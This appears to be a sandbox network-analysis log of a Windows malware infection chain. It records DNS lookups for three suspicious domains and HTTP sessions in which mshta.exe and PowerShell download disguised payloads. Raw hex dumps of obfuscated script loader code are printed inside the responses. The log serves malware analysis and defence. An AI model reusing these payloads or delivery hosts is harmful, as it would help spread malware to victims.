                                                                                                                                  Dec 25, 2024 15:10:45.980581045 CET44349860104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:45.980596066 CET49860443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:45.980603933 CET44349860104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:48.192080975 CET44349860104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:48.192161083 CET44349860104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:48.192234993 CET49860443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:48.192388058 CET49860443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:48.192403078 CET44349860104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:48.213747025 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:48.213772058 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:48.213860035 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:48.214287043 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:48.214297056 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:49.426394939 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:49.426527977 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:49.486260891 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:49.486274958 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:49.486469984 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:49.508117914 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:49.508117914 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:49.508192062 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:50.190766096 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:50.190841913 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:50.190896034 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:50.191617012 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:50.191627979 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:50.191637039 CET49866443192.168.2.4104.21.112.1
                                                                                                                                  Dec 25, 2024 15:10:50.191642046 CET44349866104.21.112.1192.168.2.4
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 25, 2024 15:09:01.095483065 CET5795553192.168.2.41.1.1.1
                                                                                                                                  Dec 25, 2024 15:09:01.535645962 CET53579551.1.1.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:09:07.446768999 CET5016153192.168.2.41.1.1.1
                                                                                                                                  Dec 25, 2024 15:09:07.858345985 CET53501611.1.1.1192.168.2.4
                                                                                                                                  Dec 25, 2024 15:10:31.242381096 CET5214553192.168.2.41.1.1.1
                                                                                                                                  Dec 25, 2024 15:10:31.580419064 CET53521451.1.1.1192.168.2.4
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Dec 25, 2024 15:09:01.095483065 CET192.168.2.41.1.1.10xfa21Standard query (0)scrutinycheck.cashA (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:09:07.446768999 CET192.168.2.41.1.1.10x686dStandard query (0)dma.sportstalk-musiclover.comA (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:10:31.242381096 CET192.168.2.41.1.1.10x132fStandard query (0)hushedocenahu.clickA (IP address)IN (0x0001)false
                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Dec 25, 2024 15:09:01.535645962 CET1.1.1.1192.168.2.40xfa21No error (0)scrutinycheck.cash104.21.38.253A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:09:01.535645962 CET1.1.1.1192.168.2.40xfa21No error (0)scrutinycheck.cash172.67.141.153A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:09:07.858345985 CET1.1.1.1192.168.2.40x686dNo error (0)dma.sportstalk-musiclover.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:09:07.858345985 CET1.1.1.1192.168.2.40x686dNo error (0)dma.sportstalk-musiclover.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:09:07.858345985 CET1.1.1.1192.168.2.40x686dNo error (0)dma.sportstalk-musiclover.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:09:07.858345985 CET1.1.1.1192.168.2.40x686dNo error (0)dma.sportstalk-musiclover.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:09:07.858345985 CET1.1.1.1192.168.2.40x686dNo error (0)dma.sportstalk-musiclover.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:09:07.858345985 CET1.1.1.1192.168.2.40x686dNo error (0)dma.sportstalk-musiclover.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:09:07.858345985 CET1.1.1.1192.168.2.40x686dNo error (0)dma.sportstalk-musiclover.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:10:31.580419064 CET1.1.1.1192.168.2.40x132fNo error (0)hushedocenahu.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:10:31.580419064 CET1.1.1.1192.168.2.40x132fNo error (0)hushedocenahu.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:10:31.580419064 CET1.1.1.1192.168.2.40x132fNo error (0)hushedocenahu.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:10:31.580419064 CET1.1.1.1192.168.2.40x132fNo error (0)hushedocenahu.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:10:31.580419064 CET1.1.1.1192.168.2.40x132fNo error (0)hushedocenahu.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:10:31.580419064 CET1.1.1.1192.168.2.40x132fNo error (0)hushedocenahu.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                  Dec 25, 2024 15:10:31.580419064 CET1.1.1.1192.168.2.40x132fNo error (0)hushedocenahu.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                  • scrutinycheck.cash
                                                                                                                                  • dma.sportstalk-musiclover.com
                                                                                                                                  • hushedocenahu.click
                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.449730104.21.38.2534433844C:\Windows\System32\mshta.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:09:02 UTC332OUTGET /singl7.mp4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-CH
                                                                                                                                  UA-CPU: AMD64
                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                  Host: scrutinycheck.cash
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-25 14:09:03 UTC948INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:09:03 GMT
                                                                                                                                  Content-Type: video/mp4
                                                                                                                                  Content-Length: 590282
                                                                                                                                  Connection: close
                                                                                                                                  ETag: "80823d8b0a3fed5995ac3bd70b17c86d"
                                                                                                                                  Last-Modified: Tue, 24 Dec 2024 19:07:31 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 2895
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=du0JkFpKBfAUnz8%2BoOia8%2BOt%2BzxLlILbVZlqGM7xAeusLIIfIUc0iVOBT37DMjgdqSiWc7RvpqR%2FkS5AtJxCavFH%2BkblMPesEecZnVNJxWvg%2BpJo2qhV4HOc3ahKJhVogafePxc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f79681a19231a17-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1974&rtt_var=762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2869&recv_bytes=914&delivery_rate=1414728&cwnd=128&unsent_bytes=0&cid=7e09186fd4e138ea&ts=466&x=0"
                                                                                                                                  2024-12-25 14:09:03 UTC421INData Raw: 36 36 6b 37 35 4f 36 65 46 36 33 68 37 34 7a 36 39 63 36 66 5a 36 65 57 32 30 6b 35 35 6a 34 63 64 34 33 4f 34 33 64 32 38 4d 34 37 62 35 36 5a 35 39 57 36 62 50 37 38 4d 32 39 42 37 62 41 37 36 4a 36 31 6a 37 32 66 32 30 4a 36 31 66 35 31 4d 37 37 4f 36 37 62 37 32 61 34 66 52 33 64 66 32 30 52 32 37 42 32 37 70 33 62 43 36 36 71 36 66 7a 37 32 73 32 30 6c 32 38 79 37 36 6d 36 31 75 37 32 4f 32 30 70 35 39 4b 34 39 64 36 35 4a 37 38 78 35 33 4b 35 61 62 32 30 6f 33 64 54 32 30 6a 33 30 42 33 62 61 35 39 65 34 39 61 36 35 59 37 38 54 35 33 51 35 61 4c 32 30 75 33 63 4a 32 30 53 34 37 78 35 36 78 35 39 63 36 62 57 37 38 5a 32 65 69 36 63 58 36 35 57 36 65 61 36 37 44 37 34 4e 36 38 50 33 62 56 32 30 71 35 39 79 34 39 43 36 35 44 37 38 52 35 33 51 35 61 7a
                                                                                                                                  Data Ascii: 66k75O6eF63h74z69c6fZ6eW20k55j4cd43O43d28M47b56Z59W6bP78M29B7bA76J61j72f20J61f51M77O67b72a4fR3df20R27B27p3bC66q6fz72s20l28y76m61u72O20p59K49d65J78x53K5ab20o3dT20j30B3ba59e49a65Y78T53Q5aL20u3cJ20S47x56x59c6bW78Z2ei6cX65W6ea67D74N68P3bV20q59y49C65D78R53Q5az
                                                                                                                                  2024-12-25 14:09:03 UTC1369INData Raw: 62 4c 36 31 54 35 31 42 37 37 4e 36 37 45 37 32 4f 34 66 67 32 30 43 33 64 48 32 30 49 36 31 73 35 31 4e 37 37 5a 36 37 47 37 32 47 34 66 77 32 30 5a 32 62 65 32 30 58 34 34 4c 36 36 49 36 63 54 34 32 6e 37 64 50 37 32 51 36 35 66 37 34 6a 37 35 6c 37 32 6d 36 65 50 32 30 76 36 31 41 35 31 71 37 37 50 36 37 65 37 32 52 34 66 4f 37 64 4f 33 62 44 37 36 6c 36 31 6b 37 32 74 32 30 71 36 31 77 35 31 58 37 37 49 36 37 46 37 32 53 34 66 72 32 30 71 33 64 62 32 30 6d 35 35 56 34 63 63 34 33 6d 34 33 72 32 38 67 35 62 6d 33 39 77 33 34 5a 33 37 65 32 63 76 33 39 50 33 34 72 33 36 4e 32 63 72 33 39 58 33 35 4a 33 34 63 32 63 6f 33 39 69 33 33 4c 33 36 62 32 63 6c 33 39 61 33 34 4f 33 39 63 32 63 71 33 39 73 33 35 48 33 30 5a 32 63 52 33 39 74 33 33 77 33 39 6e 32
                                                                                                                                  Data Ascii: bL61T51B77N67E72O4fg20C3dH20I61s51N77Z67G72G4fw20Z2be20X44L66I6cT42n7dP72Q65f74j75l72m6eP20v61A51q77P67e72R4fO7dO3bD76l61k72t20q61w51X77I67F72S4fr20q3db20m55V4cc43m43r28g5bm39w34Z37e2cv39P34r36N2cr39X35J34c2co39i33L36b2cl39a34O39c2cq39s35H30Z2cR39t33w39n2
                                                                                                                                  2024-12-25 14:09:03 UTC1369INData Raw: 4a 32 63 61 33 38 46 33 37 67 33 39 66 32 63 6f 33 38 72 33 36 4d 33 37 6c 32 63 58 33 38 61 33 37 4f 33 34 49 32 63 64 33 38 66 33 38 77 33 33 68 32 63 41 33 39 78 33 35 6d 33 35 51 32 63 45 33 38 70 33 37 68 33 31 55 32 63 74 33 38 49 33 37 48 33 33 54 32 63 4d 33 38 70 33 36 51 33 37 5a 32 63 58 33 38 6f 33 37 53 33 34 4c 32 63 46 33 38 67 33 37 77 33 36 41 32 63 53 33 39 6e 33 36 53 33 30 62 32 63 4b 33 38 6f 33 39 63 33 34 43 32 63 43 33 38 58 33 37 73 33 31 6c 32 63 48 33 39 4e 33 34 45 33 33 6b 32 63 59 33 39 4d 33 34 6c 33 38 66 32 63 6b 33 39 74 33 34 59 33 34 68 32 63 4a 33 39 70 33 30 6b 33 31 70 32 63 4d 33 38 6c 33 36 62 33 37 55 32 63 41 33 38 6c 33 39 79 33 36 52 32 63 58 33 38 46 33 36 4a 33 37 46 32 63 67 33 39 46 33 33 51 33 36 70 32 63
                                                                                                                                  Data Ascii: J2ca38F37g39f2co38r36M37l2cX38a37O34I2cd38f38w33h2cA39x35m35Q2cE38p37h31U2ct38I37H33T2cM38p36Q37Z2cX38o37S34L2cF38g37w36A2cS39n36S30b2cK38o39c34C2cC38X37s31l2cH39N34E33k2cY39M34l38f2ck39t34Y34h2cJ39p30k31p2cM38l36b37U2cA38l39y36R2cX38F36J37F2cg39F33Q36p2c
                                                                                                                                  2024-12-25 14:09:03 UTC1369INData Raw: 32 63 62 33 38 6c 33 38 50 33 35 56 32 63 55 33 38 4d 33 38 4a 33 39 45 32 63 69 33 39 49 33 30 72 33 31 67 32 63 76 33 38 50 33 39 6e 33 31 55 32 63 77 33 38 64 33 38 77 33 39 48 32 63 4b 33 38 48 33 38 50 33 38 70 32 63 6e 33 38 6d 33 39 6f 33 30 4f 32 63 6d 33 38 45 33 38 52 33 36 53 32 63 78 33 38 77 33 38 4d 33 38 63 32 63 47 33 39 50 33 30 46 33 31 7a 32 63 63 33 39 57 33 30 4a 33 30 49 32 63 58 33 39 73 33 30 70 33 31 69 32 63 6d 33 38 67 33 38 77 33 37 74 32 63 50 33 38 64 33 38 4f 33 34 55 32 63 56 33 39 61 33 30 68 33 31 69 32 63 59 33 38 76 33 38 52 33 38 64 32 63 72 33 38 59 33 38 69 33 34 79 32 63 44 33 38 4c 33 38 4e 33 35 67 32 63 58 33 39 77 33 30 66 33 31 6f 32 63 78 33 39 48 33 30 52 33 34 76 32 63 77 33 38 46 33 38 62 33 34 47 32 63 49
                                                                                                                                  Data Ascii: 2cb38l38P35V2cU38M38J39E2ci39I30r31g2cv38P39n31U2cw38d38w39H2cK38H38P38p2cn38m39o30O2cm38E38R36S2cx38w38M38c2cG39P30F31z2cc39W30J30I2cX39s30p31i2cm38g38w37t2cP38d38O34U2cV39a30h31i2cY38v38R38d2cr38Y38i34y2cD38L38N35g2cX39w30f31o2cx39H30R34v2cw38F38b34G2cI
                                                                                                                                  2024-12-25 14:09:03 UTC1369INData Raw: 63 4c 33 38 4e 33 38 66 33 33 53 32 63 52 33 38 41 33 39 46 33 31 62 32 63 4f 33 38 58 33 38 57 33 37 58 32 63 57 33 38 4f 33 38 4f 33 35 66 32 63 61 33 39 65 33 30 4d 33 31 6b 32 63 71 33 38 46 33 39 73 33 32 4d 32 63 56 33 39 6a 33 30 41 33 32 4d 32 63 56 33 38 6d 33 39 65 33 32 54 32 63 71 33 38 4d 33 39 6c 33 30 4d 32 63 6f 33 38 69 33 38 7a 33 38 51 32 63 6b 33 38 47 33 38 50 33 33 75 32 63 77 33 38 54 33 38 62 33 33 57 32 63 7a 33 38 69 33 38 52 33 34 49 32 63 6b 33 38 58 33 38 79 33 33 47 32 63 56 33 38 54 33 38 77 33 39 69 32 63 7a 33 38 73 33 38 46 33 33 62 32 63 73 33 38 44 33 39 68 33 32 4a 32 63 64 33 39 43 33 30 72 33 30 73 32 63 66 33 39 76 33 30 7a 33 35 6a 32 63 70 33 38 78 33 38 50 33 37 43 32 63 48 33 38 65 33 39 4d 33 30 6e 32 63 56 33
                                                                                                                                  Data Ascii: cL38N38f33S2cR38A39F31b2cO38X38W37X2cW38O38O35f2ca39e30M31k2cq38F39s32M2cV39j30A32M2cV38m39e32T2cq38M39l30M2co38i38z38Q2ck38G38P33u2cw38T38b33W2cz38i38R34I2ck38X38y33G2cV38T38w39i2cz38s38F33b2cs38D39h32J2cd39C30r30s2cf39v30z35j2cp38x38P37C2cH38e39M30n2cV3
                                                                                                                                  2024-12-25 14:09:03 UTC1369INData Raw: 77 33 38 46 33 38 4a 33 38 5a 32 63 63 33 38 6b 33 38 53 33 33 58 32 63 43 33 38 7a 33 39 74 33 31 59 32 63 46 33 38 51 33 39 50 33 31 71 32 63 76 33 38 4c 33 38 6b 33 38 45 32 63 56 33 38 70 33 38 59 33 34 73 32 63 6e 33 38 48 33 38 77 33 33 70 32 63 44 33 38 55 33 38 62 33 33 6d 32 63 70 33 39 4c 33 30 67 33 32 65 32 63 51 33 38 41 33 38 49 33 36 6f 32 63 44 33 38 6d 33 38 65 33 38 56 32 63 65 33 38 6c 33 38 48 33 35 6c 32 63 68 33 38 7a 33 38 73 33 39 47 32 63 52 33 38 68 33 39 54 33 30 47 32 63 67 33 38 52 33 39 6c 33 30 56 32 63 6f 33 38 64 33 38 54 33 37 69 32 63 59 33 39 48 33 30 69 33 33 74 32 63 6a 33 38 6c 33 38 61 33 33 76 32 63 44 33 38 77 33 38 41 33 33 69 32 63 4b 33 38 44 33 39 4e 33 30 42 32 63 7a 33 38 4b 33 38 49 33 37 45 32 63 62 33 39
                                                                                                                                  Data Ascii: w38F38J38Z2cc38k38S33X2cC38z39t31Y2cF38Q39P31q2cv38L38k38E2cV38p38Y34s2cn38H38w33p2cD38U38b33m2cp39L30g32e2cQ38A38I36o2cD38m38e38V2ce38l38H35l2ch38z38s39G2cR38h39T30G2cg38R39l30V2co38d38T37i2cY39H30i33t2cj38l38a33v2cD38w38A33i2cK38D39N30B2cz38K38I37E2cb39
                                                                                                                                  2024-12-25 14:09:03 UTC1369INData Raw: 33 38 62 33 39 51 33 30 63 32 63 7a 33 38 77 33 38 61 33 38 59 32 63 45 33 38 4d 33 39 6a 33 31 71 32 63 58 33 39 6e 33 30 63 33 34 75 32 63 68 33 38 45 33 38 46 33 37 45 32 63 73 33 38 4f 33 39 4a 33 30 58 32 63 79 33 39 4e 33 30 55 33 32 48 32 63 47 33 39 65 33 30 48 33 31 55 32 63 67 33 38 4f 33 38 4f 33 38 49 32 63 70 33 38 72 33 38 70 33 35 52 32 63 50 33 38 63 33 38 5a 33 35 6d 32 63 4b 33 39 47 33 30 46 33 34 63 32 63 65 33 39 45 33 30 73 33 33 78 32 63 4f 33 39 6e 33 30 54 33 35 6c 32 63 53 33 39 74 33 30 64 33 35 6c 32 63 63 33 39 54 33 30 53 33 35 5a 32 63 46 33 39 50 33 30 4a 33 34 49 32 63 5a 33 38 54 33 39 46 33 30 71 32 63 50 33 38 6f 33 38 70 33 36 50 32 63 70 33 39 57 33 30 4e 33 32 72 32 63 49 33 39 72 33 30 64 33 32 43 32 63 6d 33 38 4b
                                                                                                                                  Data Ascii: 38b39Q30c2cz38w38a38Y2cE38M39j31q2cX39n30c34u2ch38E38F37E2cs38O39J30X2cy39N30U32H2cG39e30H31U2cg38O38O38I2cp38r38p35R2cP38c38Z35m2cK39G30F34c2ce39E30s33x2cO39n30T35l2cS39t30d35l2cc39T30S35Z2cF39P30J34I2cZ38T39F30q2cP38o38p36P2cp39W30N32r2cI39r30d32C2cm38K
                                                                                                                                  2024-12-25 14:09:03 UTC1369INData Raw: 38 43 33 38 6a 33 36 65 32 63 58 33 38 46 33 38 54 33 33 4d 32 63 45 33 38 64 33 39 62 33 32 57 32 63 48 33 39 76 33 30 76 33 30 61 32 63 63 33 38 6a 33 38 50 33 39 66 32 63 77 33 39 59 33 30 61 33 33 68 32 63 47 33 38 4b 33 38 79 33 35 61 32 63 72 33 38 69 33 39 6a 33 30 64 32 63 74 33 39 78 33 30 4d 33 33 65 32 63 74 33 38 73 33 38 45 33 38 62 32 63 45 33 38 66 33 38 70 33 39 58 32 63 50 33 38 67 33 38 67 33 38 77 32 63 68 33 38 72 33 38 6f 33 33 73 32 63 58 33 38 7a 33 38 57 33 33 59 32 63 62 33 39 42 33 30 59 33 31 4e 32 63 47 33 38 74 33 39 55 33 30 57 32 63 75 33 38 78 33 39 64 33 32 4a 32 63 6a 33 39 52 33 30 68 33 30 6a 32 63 66 33 39 6e 33 30 61 33 33 51 32 63 69 33 39 44 33 30 52 33 33 61 32 63 64 33 38 43 33 38 73 33 39 7a 32 63 74 33 38 71 33
                                                                                                                                  Data Ascii: 8C38j36e2cX38F38T33M2cE38d39b32W2cH39v30v30a2cc38j38P39f2cw39Y30a33h2cG38K38y35a2cr38i39j30d2ct39x30M33e2ct38s38E38b2cE38f38p39X2cP38g38g38w2ch38r38o33s2cX38z38W33Y2cb39B30Y31N2cG38t39U30W2cu38x39d32J2cj39R30h30j2cf39n30a33Q2ci39D30R33a2cd38C38s39z2ct38q3
                                                                                                                                  2024-12-25 14:09:03 UTC1369INData Raw: 54 33 38 70 33 38 6b 32 63 43 33 38 56 33 38 4c 33 39 52 32 63 70 33 38 79 33 38 56 33 38 57 32 63 4e 33 38 53 33 38 4f 33 38 68 32 63 4a 33 38 68 33 38 4d 33 39 72 32 63 6c 33 38 56 33 38 6e 33 33 6a 32 63 6c 33 38 45 33 39 73 33 30 55 32 63 47 33 39 4d 33 30 4c 33 32 4b 32 63 4e 33 38 42 33 39 4a 33 30 55 32 63 50 33 39 65 33 30 49 33 30 61 32 63 70 33 38 52 33 38 48 33 35 71 32 63 4d 33 39 62 33 30 69 33 35 71 32 63 55 33 39 66 33 30 70 33 33 77 32 63 4f 33 39 41 33 30 77 33 31 53 32 63 67 33 38 47 33 38 79 33 38 79 32 63 64 33 38 72 33 39 4c 33 32 64 32 63 6d 33 38 4b 33 38 49 33 38 4d 32 63 49 33 39 75 33 30 53 33 34 65 32 63 5a 33 39 6d 33 30 42 33 32 55 32 63 4e 33 39 77 33 30 57 33 31 4b 32 63 56 33 39 42 33 30 41 33 33 61 32 63 58 33 38 50 33 38
                                                                                                                                  Data Ascii: T38p38k2cC38V38L39R2cp38y38V38W2cN38S38O38h2cJ38h38M39r2cl38V38n33j2cl38E39s30U2cG39M30L32K2cN38B39J30U2cP39e30I30a2cp38R38H35q2cM39b30i35q2cU39f30p33w2cO39A30w31S2cg38G38y38y2cd38r39L32d2cm38K38I38M2cI39u30S34e2cZ39m30B32U2cN39w30W31K2cV39B30A33a2cX38P38
                                                                                                                                  2024-12-25 14:09:03 UTC1369INData Raw: 33 38 46 33 38 4d 32 63 6e 33 38 73 33 38 74 33 35 4d 32 63 78 33 39 74 33 30 42 33 33 43 32 63 59 33 38 42 33 38 6b 33 38 4b 32 63 72 33 38 76 33 38 6c 33 36 50 32 63 45 33 39 78 33 30 68 33 34 67 32 63 4c 33 39 67 33 30 41 33 33 47 32 63 73 33 38 77 33 39 41 33 30 44 32 63 4f 33 38 4a 33 38 5a 33 34 62 32 63 78 33 38 77 33 38 46 33 38 6a 32 63 65 33 38 49 33 39 44 33 30 56 32 63 71 33 38 50 33 39 79 33 31 4a 32 63 6e 33 38 64 33 39 6b 33 30 6c 32 63 71 33 38 43 33 38 4b 33 37 44 32 63 46 33 39 59 33 30 42 33 35 47 32 63 72 33 38 6e 33 38 55 33 35 42 32 63 73 33 38 79 33 38 6f 33 39 50 32 63 62 33 38 4a 33 38 4e 33 36 76 32 63 71 33 39 43 33 30 6c 33 35 77 32 63 74 33 38 4d 33 38 71 33 38 76 32 63 69 33 38 72 33 38 53 33 35 4f 32 63 4d 33 39 50 33 30 4d
                                                                                                                                  Data Ascii: 38F38M2cn38s38t35M2cx39t30B33C2cY38B38k38K2cr38v38l36P2cE39x30h34g2cL39g30A33G2cs38w39A30D2cO38J38Z34b2cx38w38F38j2ce38I39D30V2cq38P39y31J2cn38d39k30l2cq38C38K37D2cF39Y30B35G2cr38n38U35B2cs38y38o39P2cb38J38N36v2cq39C30l35w2ct38M38q38v2ci38r38S35O2cM39P30M


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  1192.168.2.449734104.21.16.14437176C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-25 14:09:09 UTC89OUTGET /singl7.pst HTTP/1.1
                                                                                                                                  Host: dma.sportstalk-musiclover.com
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-25 14:09:09 UTC996INHTTP/1.1 200 OK
                                                                                                                                  Date: Wed, 25 Dec 2024 14:09:09 GMT
                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                  Content-Length: 8923628
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: Express
                                                                                                                                  ETag: W/"8829ec-NGbaHnhYd+JyW+GaUTyrx1oB4Vs"
                                                                                                                                  Set-Cookie: connect.sid=s%3AQYYt7U2X_y9yv5f9RXAt7xon7x0nzXLn.wK%2FXff9EEf4YzlFeuJUfbz3bVRptOxI0KNGPah6tAA4; Path=/; HttpOnly
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K5HO8SRe4rcyJTcufhidQBu33lWkSpnWwrIDImMfVuHjX9VwzdttwzTFou7Jf9sA8Mui1uQq5zmUuurkxnlTASp9kxUdXbQqbt1i0hh1s8XVyqHieG4drxiU84atmkLrFuyICL5tWMsSjn9i5ZXOTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8f7968418c531899-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1654&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=703&delivery_rate=1662870&cwnd=153&unsent_bytes=0&cid=8209e72aafa5165d&ts=699&x=0"
                                                                                                                                  2024-12-25 14:09:09 UTC1369INData Raw: 24 65 62 59 79 33 32 4c 76 62 53 71 6b 37 75 6a 65 4c 48 68 4b 66 54 67 38 46 78 73 58 57 46 33 58 4b 72 78 33 78 63 33 52 51 41 51 6a 58 69 72 30 4e 54 68 66 42 42 75 43 44 72 52 35 34 38 31 6e 6c 52 62 69 4d 39 4d 44 61 37 6d 35 75 4e 49 31 47 64 72 6f 41 44 4d 58 51 69 31 68 55 43 68 70 52 31 65 76 50 6a 49 73 54 6b 34 50 33 37 4c 46 55 61 78 70 65 7a 62 4c 36 36 36 46 77 41 72 4b 36 5a 56 4b 4d 45 6b 71 71 74 72 44 35 32 47 4b 77 56 55 62 30 7a 32 68 7a 71 53 72 79 74 44 6f 48 39 4d 39 41 70 4d 4b 4a 67 4f 33 42 36 37 42 66 68 45 6b 49 6c 61 67 69 74 45 38 4d 78 58 37 52 35 51 46 34 68 52 45 4b 46 65 45 42 6f 6a 75 65 37 43 4a 68 58 61 59 31 68 6b 4b 73 73 6f 41 73 71 79 5a 50 41 71 53 5a 37 57 77 74 7a 39 39 53 35 6c 71 44 30 30 77 49 35 5a 6f 32 45
                                                                                                                                  Data Ascii: $ebYy32LvbSqk7ujeLHhKfTg8FxsXWF3XKrx3xc3RQAQjXir0NThfBBuCDrR5481nlRbiM9MDa7m5uNI1GdroADMXQi1hUChpR1evPjIsTk4P37LFUaxpezbL666FwArK6ZVKMEkqqtrD52GKwVUb0z2hzqSrytDoH9M9ApMKJgO3B67BfhEkIlagitE8MxX7R5QF4hREKFeEBojue7CJhXaY1hkKssoAsqyZPAqSZ7Wwtz99S5lqD00wI5Zo2E
